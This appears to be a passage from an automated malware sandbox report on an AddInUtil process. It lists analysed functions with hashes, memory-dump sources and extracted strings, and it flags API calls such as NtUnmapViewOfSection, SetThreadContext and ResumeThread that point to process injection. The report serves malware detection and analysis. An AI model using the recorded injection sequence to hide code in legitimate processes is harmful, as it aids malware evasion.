Opcode Fuzzy Hash: 40e92dce70966ee3d66b1be6fbde400d66a222e7b5622e2e8f863b59f6aeed25
Instruction Fuzzy Hash: F8A12A3190CB8C4FDB19AB6898166E97BF0FF56310F0442AFD449C3193DB28AC598B96

Function 00007FF8490B7C7D Relevance: 2.1, APIs: 1, Instructions: 630
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 00007FF8490B811E

Memory Dump Source

Source File: 00000005.00000002.4912525787.00007FF8490A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff8490a0000_AddInUtil.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 8a07ebad105105285a67f134ba82591a95225dc79198976bd19a04569be4522e
Instruction ID: 34b9f26538898a338cff20bf57f53661d678c67a964ca49d21dbbfe3e97582ca
Opcode Fuzzy Hash: 8a07ebad105105285a67f134ba82591a95225dc79198976bd19a04569be4522e
Instruction Fuzzy Hash: E641B63190D7C84FDB2AAB7898551E97FF0EF57311F0841AFD08AC7193DA28584ACB52

Function 00007FF848F26260 Relevance: 1.8, Instructions: 1763
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.4895533837.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f20000_AddInUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d33e88b8decda055196488a46a9e817403f2c4b726c76c8c04d8c403f01aa5
Instruction ID: 7e73cd235525d2a41fd4f76558516e59904c0212fc7b1871a2ecb295cf4bfbfb
Opcode Fuzzy Hash: 67d33e88b8decda055196488a46a9e817403f2c4b726c76c8c04d8c403f01aa5
Instruction Fuzzy Hash: 63C29271A1C9098FDB98EB1C8455AB977E2FFA9340F5401BAD40DD72D6CE38EC828B45

Function 00007FF849003121 Relevance: .9, Instructions: 885COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4906018293.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849000000_AddInUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b11cb0cdfd488f537e07365d42ee7bb7a7e6a176c38fed3a1f31e1a3461ea542
Instruction ID: deb163809e4fa4dd51c84d34aff91391f1cbc35101a58a54300d1dfd1e923300
Opcode Fuzzy Hash: b11cb0cdfd488f537e07365d42ee7bb7a7e6a176c38fed3a1f31e1a3461ea542
Instruction Fuzzy Hash: F842C621F1DAC60FEBA7BB28146627927D2AFA6280F5941FAC44DC72D3EE5CDC064345

Function 00007FF848F205B8 Relevance: 13.0, Strings: 10, Instructions: 467
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

x[^d, xrefs: 00007FF848F223E5
([^d, xrefs: 00007FF848F225EF
([^d, xrefs: 00007FF848F22305
h[^d, xrefs: 00007FF848F225D9
h[^d, xrefs: 00007FF848F224EA
([^d, xrefs: 00007FF848F225C2
x[^d, xrefs: 00007FF848F2244B
h[^d, xrefs: 00007FF848F2234E
x[^d, xrefs: 00007FF848F22360
([^d, xrefs: 00007FF848F22529

Memory Dump Source

Source File: 00000005.00000002.4895533837.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f20000_AddInUtil.jbxd

Similarity

API ID:
String ID: ([^d$([^d$([^d$([^d$h[^d$h[^d$h[^d$x[^d$x[^d$x[^d
API String ID: 0-408202662
Opcode ID: c94fde896071c8bde6d24a91d53d565c52204176d4e29d7956fde139e407dd58
Instruction ID: 4fa8f1cdde9a99a3324d115e98b63222129b75cda08c0b3151dc5cedaf91eaac
Opcode Fuzzy Hash: c94fde896071c8bde6d24a91d53d565c52204176d4e29d7956fde139e407dd58
Instruction Fuzzy Hash: B3E1F370A08A0D8FEB98EB6CC451675B7E2FFA9344F1101BAD04EC72D6DE35E8428B45

Function 00007FF848F2054F Relevance: 9.1, Strings: 7, Instructions: 375
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

x[^d, xrefs: 00007FF848F223E5
([^d, xrefs: 00007FF848F22305
h[^d, xrefs: 00007FF848F224EA
x[^d, xrefs: 00007FF848F2244B
h[^d, xrefs: 00007FF848F2234E
x[^d, xrefs: 00007FF848F22360
([^d, xrefs: 00007FF848F22529

Memory Dump Source

Source File: 00000005.00000002.4895533837.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f20000_AddInUtil.jbxd

Similarity

API ID:
String ID: ([^d$([^d$h[^d$h[^d$x[^d$x[^d$x[^d
API String ID: 0-3945332004
Opcode ID: 83c6808eff7ce6ac1c838d813b2f728436ce596f5ab50c3daae193ea660c6cdb
Instruction ID: 64fcb12b42f8b31ad92e256964180536b92be2cda13132799333856f0d9228bf
Opcode Fuzzy Hash: 83c6808eff7ce6ac1c838d813b2f728436ce596f5ab50c3daae193ea660c6cdb
Instruction Fuzzy Hash: CDC11331A089098FEB84EB6CD0507B5B7E2FFA5350F1541BAD04DCB2D2DF39A8428B55

Function 00007FF848F2225D Relevance: 9.1, Strings: 7, Instructions: 353
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

x[^d, xrefs: 00007FF848F223E5
([^d, xrefs: 00007FF848F22305
h[^d, xrefs: 00007FF848F224EA
x[^d, xrefs: 00007FF848F2244B
h[^d, xrefs: 00007FF848F2234E
x[^d, xrefs: 00007FF848F22360
([^d, xrefs: 00007FF848F22529

Memory Dump Source

Source File: 00000005.00000002.4895533837.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f20000_AddInUtil.jbxd

Similarity

API ID:
String ID: ([^d$([^d$h[^d$h[^d$x[^d$x[^d$x[^d
API String ID: 0-3945332004
Opcode ID: cb64b6e4881c4dadcda4499505bb73bdf4614de703f38be6790b143f654086a7
Instruction ID: 50da564d5af32807d7a17f6edd3e4ad2d74e633e3d124368684fd49745024f75
Opcode Fuzzy Hash: cb64b6e4881c4dadcda4499505bb73bdf4614de703f38be6790b143f654086a7
Instruction Fuzzy Hash: E5B1D331A0CA098FDB94EB6CD4517B5B7E2FFA5340F1501BAD00DCB2D6DA39AC428755

Function 00007FF848F205B0 Relevance: 9.1, Strings: 7, Instructions: 328
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

x[^d, xrefs: 00007FF848F223E5
([^d, xrefs: 00007FF848F22305
h[^d, xrefs: 00007FF848F224EA
x[^d, xrefs: 00007FF848F2244B
h[^d, xrefs: 00007FF848F2234E
x[^d, xrefs: 00007FF848F22360
([^d, xrefs: 00007FF848F22529

Memory Dump Source

Source File: 00000005.00000002.4895533837.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f20000_AddInUtil.jbxd

Similarity

API ID:
String ID: ([^d$([^d$h[^d$h[^d$x[^d$x[^d$x[^d
API String ID: 0-3945332004
Opcode ID: 4d48c594f7123b8458c1c445c7ff65b3d406210d7b2f5d92f54f24ec8be2f54b
Instruction ID: 7725002bc563ae76ad71c45e0b44a45ce6377f5f4c5b667e642e025e42ca6e53
Opcode Fuzzy Hash: 4d48c594f7123b8458c1c445c7ff65b3d406210d7b2f5d92f54f24ec8be2f54b
Instruction Fuzzy Hash: A7A1C031A0890D8FEB94EB6CD0517B5B7E2FFA9340F1541BAD00DCB2D6DA35E8428B45

Function 00007FF848F2394B Relevance: 2.5, Strings: 2, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

x[^d, xrefs: 00007FF848F2394C
M_H, xrefs: 00007FF848F23570

Memory Dump Source

Source File: 00000005.00000002.4895533837.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f20000_AddInUtil.jbxd

Similarity

API ID:
String ID: x[^d$M_H
API String ID: 0-480927920
Opcode ID: d14e22f08ef8c4963c60039141627944f43cd47b6eeca2a86fc4abcee7a30b18
Instruction ID: de93864e0a841ddd8fd392df0f757f9cfc50ef71c300d6e3f8bb8cc29fdc9ffa
Opcode Fuzzy Hash: d14e22f08ef8c4963c60039141627944f43cd47b6eeca2a86fc4abcee7a30b18
Instruction Fuzzy Hash: 82F0963060C6098FEB5CFB2C949253573D2EFA9740F000179D94AC72D7DE29EC018746

Function 00007FF8490B8160 Relevance: 1.9, APIs: 1, Instructions: 416
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32 ref: 00007FF8490B84F5

Memory Dump Source

Source File: 00000005.00000002.4912525787.00007FF8490A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff8490a0000_AddInUtil.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 16f203bb9d88e15cd0c85ef06a0064ad335efffb206f4d1c8bd11250f7744cfe
Instruction ID: 385191d27b3a8d31427621177622397a5589ea42be0c2a5d907ee7ac7d6b6be9
Opcode Fuzzy Hash: 16f203bb9d88e15cd0c85ef06a0064ad335efffb206f4d1c8bd11250f7744cfe
Instruction Fuzzy Hash: DBD1CF3091CA8D8FEB74EF68C8467E977E1FB58310F04426ADC4EC7291DB74A9458B82

Function 00007FF8490B758D Relevance: 1.8, APIs: 1, Instructions: 273
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32 ref: 00007FF8490B7647

Memory Dump Source

Source File: 00000005.00000002.4912525787.00007FF8490A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff8490a0000_AddInUtil.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 87ba585be7133f369b6f3e07306ed9dfd329ccd250f70731e31f1844e3e96f72
Instruction ID: 8d87daa4e914f8c4ebee8c5f8d91c71a9fb7b54da83abe7f02b0ae3b46211a30
Opcode Fuzzy Hash: 87ba585be7133f369b6f3e07306ed9dfd329ccd250f70731e31f1844e3e96f72
Instruction Fuzzy Hash: 1781F93180D7884FDB29DFA898466E97BE0EF56320F0442AFD449C7593DB78A845CB91

Function 00007FF8490B77D0 Relevance: 1.6, APIs: 1, Instructions: 136
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadContext.KERNEL32 ref: 00007FF8490B78AE

Memory Dump Source

Source File: 00000005.00000002.4912525787.00007FF8490A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff8490a0000_AddInUtil.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 62f1ea10e954474d722b686ee2daa12a0ae99f3f2c61c0983045470260cabb69
Instruction ID: f70d888cf633811ddfd41f70c8b363d5a90d6f35f7a87b229407b5cbd2a47dce
Opcode Fuzzy Hash: 62f1ea10e954474d722b686ee2daa12a0ae99f3f2c61c0983045470260cabb69
Instruction Fuzzy Hash: B3411931C0CB884FDB29AB6898466F97FE0EF56350F0401BFD089C3593DB68A849CB52

Function 00007FF848F216A3 Relevance: 1.5, Strings: 1, Instructions: 215
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`?, xrefs: 00007FF848F21684

Memory Dump Source

Source File: 00000005.00000002.4895533837.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f20000_AddInUtil.jbxd

Similarity

API ID:
String ID: `?
API String ID: 0-262000912
Opcode ID: d28d9324025259e372a4e67954541136ebef8af1511926784742100202442d42
Instruction ID: 9f32a6abda37afab10386929d98db6e5c6b8158cdf2e53b2a9c36d34493c069e
Opcode Fuzzy Hash: d28d9324025259e372a4e67954541136ebef8af1511926784742100202442d42
Instruction Fuzzy Hash: 47518D31E1C8194FE7A8F76CA4657B976E2FF89780F540179D00ED32C6DE29AC428749

Function 00007FF848F2154F Relevance: 1.4, Strings: 1, Instructions: 144COMMON

Download Yara Rule

Strings

`?, xrefs: 00007FF848F21684

Memory Dump Source

Source File: 00000005.00000002.4895533837.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f20000_AddInUtil.jbxd

Similarity

API ID:
String ID: `?
API String ID: 0-262000912
Opcode ID: c8f422e4a8768a57273a3d4908bc8985cbbe77f0910600ae0038df17838e0e36
Instruction ID: 2d065a06282869cb3b897aaa3c1194c2a9787ad324f6f564cfe65610a1dd5677
Opcode Fuzzy Hash: c8f422e4a8768a57273a3d4908bc8985cbbe77f0910600ae0038df17838e0e36
Instruction Fuzzy Hash: F2410D31A1881D9FDB99EB6CC455AA877E2FF6C340B4500B5E00ED72A1DE29EC418B14

Function 00007FF848F23565 Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

M_H, xrefs: 00007FF848F23570

Memory Dump Source

Source File: 00000005.00000002.4895533837.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f20000_AddInUtil.jbxd

Similarity

API ID:
String ID: M_H
API String ID: 0-372873180
Opcode ID: 5c6ab316a5e68b4544c849d71aef258c0be945944870beecd5aa166d9c9bcfe3
Instruction ID: bf498fe285a7f7c683bd499305087af2f7634903996efee126edf38f1075f9cf
Opcode Fuzzy Hash: 5c6ab316a5e68b4544c849d71aef258c0be945944870beecd5aa166d9c9bcfe3
Instruction Fuzzy Hash: A8D05E31A0CA4A8FE148B65CA852079B3D2EB98B40F000079D84AC32D2EE19AC014206

Function 00007FF849000F90 Relevance: .9, Instructions: 878COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4906018293.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849000000_AddInUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffb5ab70447fcd30e44dc7c05c27df26459d00cefd0b9a628b4d55fbfbf011ae
Instruction ID: 448df9aa1aebc88b1bc0202c03bb33ef543ffc641b3425d13d189917a7141838
Opcode Fuzzy Hash: ffb5ab70447fcd30e44dc7c05c27df26459d00cefd0b9a628b4d55fbfbf011ae
Instruction Fuzzy Hash: 02327E21F1DE8B5EFAF9AE2C245567552D3EFD8691B9801FAC04EC32D6ED2CEC064244

Function 00007FF849001761 Relevance: .6, Instructions: 619COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4906018293.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849000000_AddInUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea50af55eb8a94385219b2c8d7cc0283c7eedbb4cd1b6dbc1f803aaade599fc5
Instruction ID: cb6209b7a024935d2fd86a04d88df40d2c0d52bd180b64db357d78c82c22fe16
Opcode Fuzzy Hash: ea50af55eb8a94385219b2c8d7cc0283c7eedbb4cd1b6dbc1f803aaade599fc5
Instruction Fuzzy Hash: DD029F21F1CD9A0EEAFABF2C20516B956D2EF996D0F5501FAC00DC72C7EE1CE9464245

Function 00007FF848F25748 Relevance: .5, Instructions: 500COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4895533837.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f20000_AddInUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09cfa29d2291884a9447394a5b39692c59b1d9b7cf053ece6ec74a3958237851
Instruction ID: 7414746eb9dd4b07bdd62a281346405a1b02b0e58e0a59bb285c6d3c348cb6cc
Opcode Fuzzy Hash: 09cfa29d2291884a9447394a5b39692c59b1d9b7cf053ece6ec74a3958237851
Instruction Fuzzy Hash: F6E12371A0CA098FDB58FF2CC4556B9B7E1FFA9354F1102BAD04DCB2D2DE24A8428B55

Function 00007FF849003BC6 Relevance: .5, Instructions: 453COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4906018293.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849000000_AddInUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72e7f6d03b3b5c840aa30190f30f4029abbeb8045a1aeb6a4e30bcd1b0db8751
Instruction ID: d9119444e4483abefa1ea9cc961aae874e534200a436b6465a04868589f51e9f
Opcode Fuzzy Hash: 72e7f6d03b3b5c840aa30190f30f4029abbeb8045a1aeb6a4e30bcd1b0db8751
Instruction Fuzzy Hash: 15C10B21F1CD9B4EFDBABB2C246127D4192EFD86D0F9445FAD50EC22C6EE2CE8425245

Function 00007FF848F25798 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4895533837.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f20000_AddInUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07a51da434467a9fb1970dca69795546e5a9e5969fcc6951dcb4dccc887eec88
Instruction ID: c7d6a651d7f0a20e2091557d6993efa52239d60a085bf65b9128fa4200dc3629
Opcode Fuzzy Hash: 07a51da434467a9fb1970dca69795546e5a9e5969fcc6951dcb4dccc887eec88
Instruction Fuzzy Hash: 2AA1B171A089098FDB94EF2CC444A75B7E2FFA9344F5501BAD40DCB2D6DB34E8828B55

Function 00007FF84900146B Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4906018293.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849000000_AddInUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5b4f685ecf83da5f008248707e4dfa8f0aeefeff03ad32584e29506565c7fa5
Instruction ID: 565c0fb316b42e0fa3cbf760b21b7708cff559a4459926570957c4bf8d795374
Opcode Fuzzy Hash: a5b4f685ecf83da5f008248707e4dfa8f0aeefeff03ad32584e29506565c7fa5
Instruction Fuzzy Hash: B5314C21F1CE8A1EF6E9BB2C146563A51D3EFD8691B9801BAD40EC32D7EE2CDC464345

Function 00007FF848F214E1 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4895533837.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f20000_AddInUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a111ef3f302f6d0d5048bc71e0065e0c9a13e2f71eb072f7a9589aa0a0b12bfb
Instruction ID: 6b48cbe314c44203a525bf23ac5a682bea13638586c2d33cdfe550855d110dc7
Opcode Fuzzy Hash: a111ef3f302f6d0d5048bc71e0065e0c9a13e2f71eb072f7a9589aa0a0b12bfb
Instruction Fuzzy Hash: C101B17180E7C54FD7139BA488BA29A3FB0AF17310F0904EBC0C5CB1E3E619A419C766

Function 00007FF848F214AE Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4895533837.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f20000_AddInUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e86357ad988ae02c9ea1eb3036cec864520067d113f370aaabf7f78aaff34ec4
Instruction ID: 97c5a8ff672619ee1183eb7fedfb72c3f1d2565fc5871732f2e3bb5161a3a7ad
Opcode Fuzzy Hash: e86357ad988ae02c9ea1eb3036cec864520067d113f370aaabf7f78aaff34ec4
Instruction Fuzzy Hash: C901716180D7C54FD75397A4887A2D93FB0AF17350F1905EBC0858B1D3DA186059D71A

Function 00007FF848F25AD1 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4895533837.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f20000_AddInUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e5dad6dc1b3abfcb461041dcf37c8b96b21313cd2d2a9aedce6f32dac37a804
Instruction ID: f7ec044242552350414e0d5510a3cb96e0e45892ba5ec0eb333226e45d13e165
Opcode Fuzzy Hash: 8e5dad6dc1b3abfcb461041dcf37c8b96b21313cd2d2a9aedce6f32dac37a804
Instruction Fuzzy Hash: 66018C35E0D54DDFEB54FFA8D4851EDBBA0FF18351F6041A5D405C3280EB356A44CA84

Function 00007FF848F2E460 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4895533837.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f20000_AddInUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cef4647f8917ebfd3876022fd9fd6eb5aa03077247ac0b96ed026bff8474845
Instruction ID: 14e40769083ac8acbfff3e47cceb325cf3f24b35bc20ee9d88b180ff9109347f
Opcode Fuzzy Hash: 6cef4647f8917ebfd3876022fd9fd6eb5aa03077247ac0b96ed026bff8474845
Instruction Fuzzy Hash: 7FF08260B4DD0D4FDB98F73D94656752AD2EBA9350B9100B5D40CC739AED29D881CB05

Function 00007FF848F208A9 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4895533837.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f20000_AddInUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5e58f2a6b8ad46405b806e5a9d85d3e5b300ea43d8da861b1a81ea84e90995f
Instruction ID: a05ef6ffad270c8edc87d13e0bfbfb5236eaae8c2828372b18996367741f56e8
Opcode Fuzzy Hash: f5e58f2a6b8ad46405b806e5a9d85d3e5b300ea43d8da861b1a81ea84e90995f
Instruction Fuzzy Hash: 23F0FB3284E3C80FD313AB3068652A43F70AF83220F0A42DBD498CA0A3EA19581D8362

Function 00007FF848F25BB7 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4895533837.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f20000_AddInUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 925961ccc1e06b09dcbffba93eca5bce7c7831aae91af3f09993101140959c67
Instruction ID: 7bba2ea4a3d5cfdb33790eed1ab8011ed4f5feff70288f72f7edae4c2f7657ce
Opcode Fuzzy Hash: 925961ccc1e06b09dcbffba93eca5bce7c7831aae91af3f09993101140959c67
Instruction Fuzzy Hash: 1BF0F030E0C24A8FE788EF28D4442BD77E0FB19341F0001BAD009C72C5DB39AAC48B48

Function 00007FF848F30758 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4895533837.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f20000_AddInUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a3ec3e76c0516d1d8154c116b81c35b4b5fd358598e112ea876db819b6d6eca
Instruction ID: fec82c503ab9d72c959d69a27d673fb3da37480620fe50f67ce459ae5b44b0b5
Opcode Fuzzy Hash: 6a3ec3e76c0516d1d8154c116b81c35b4b5fd358598e112ea876db819b6d6eca
Instruction Fuzzy Hash: E6D05E30B10D0D4B8B0CB62D885C434B3D2E7B9602B94536A940AC22A1ED65ECC5C785

Function 00007FF848F307A8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4895533837.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f20000_AddInUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d894064c800f49ad574bfe779a6eac297a60fdd699351369600eab289ed28d42
Instruction ID: 7232cdfaa8b66055ccb3f4c2fee720d0e06114757a8a473aeb0cb536b3f1ed2e
Opcode Fuzzy Hash: d894064c800f49ad574bfe779a6eac297a60fdd699351369600eab289ed28d42
Instruction Fuzzy Hash: 23D05E30B10D0D4B9B0CB62D885D430B3D1E7B9602794636A940AC2291ED26ECC58784

Function 00007FF849002FBB Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4906018293.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849000000_AddInUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af45f5173b60a5ff45b377f297cf22ede29c54c90d498ba432f900e7352fdfb9
Instruction ID: c855497a902ddcedca0716003f8991ac15a4d88a40a33578c05c67ef09d14a37
Opcode Fuzzy Hash: af45f5173b60a5ff45b377f297cf22ede29c54c90d498ba432f900e7352fdfb9
Instruction Fuzzy Hash: 35D0C95172D5268BF614738C78423B8B286DB896A0F501276E209C26CAC86EAC8242CA

Function 00007FF848F26370 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4895533837.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f20000_AddInUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ead3a0e58f0c5d9da20020c387d271f61ec58af7be642a7fbcbe58addd59bd6
Instruction ID: 6f5843bff4f606e137403ec41dd00fce8b83286e94b6316a80e8e5826390be81
Opcode Fuzzy Hash: 6ead3a0e58f0c5d9da20020c387d271f61ec58af7be642a7fbcbe58addd59bd6
Instruction Fuzzy Hash: 00D0C930AA49094F8B4CF73C985996072E1EB69216B9540A9D00AC72A5EA6AD889C741

Function 00007FF848F30780 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4895533837.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f20000_AddInUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e898bf519c000987ed387466e178488bdce676e11ae049dc425e36c90a31a75
Instruction ID: fb9018037746e481659d3bc52c3b36e890d53b45f197240a7fabe97ce918b3fb
Opcode Fuzzy Hash: 7e898bf519c000987ed387466e178488bdce676e11ae049dc425e36c90a31a75
Instruction Fuzzy Hash: 8ED0C930A649084F8B4CB72D885996472D1EBAD216B9540A9D00EC72A2EA6AE899C741

Function 00007FF848F307D0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4895533837.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f20000_AddInUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba8426fb53cdba9a6723275a0ca9023e8976b1abea7bf696a7a3cf224e422fd5
Instruction ID: 9927a39c523d08be609737bc4575c5fd0ff00b276c69e788d90e1b8f59192d77
Opcode Fuzzy Hash: ba8426fb53cdba9a6723275a0ca9023e8976b1abea7bf696a7a3cf224e422fd5
Instruction Fuzzy Hash: E7D0C930B649084F8B4CBB2C885996072D1EB69216B9540A9D40EC72B1EA6AE889C741

Non-executed Functions

Function 00007FF848F21EAD Relevance: 15.4, Strings: 12, Instructions: 369COMMON

Download Yara Rule

Strings

x[^d, xrefs: 00007FF848F21F29
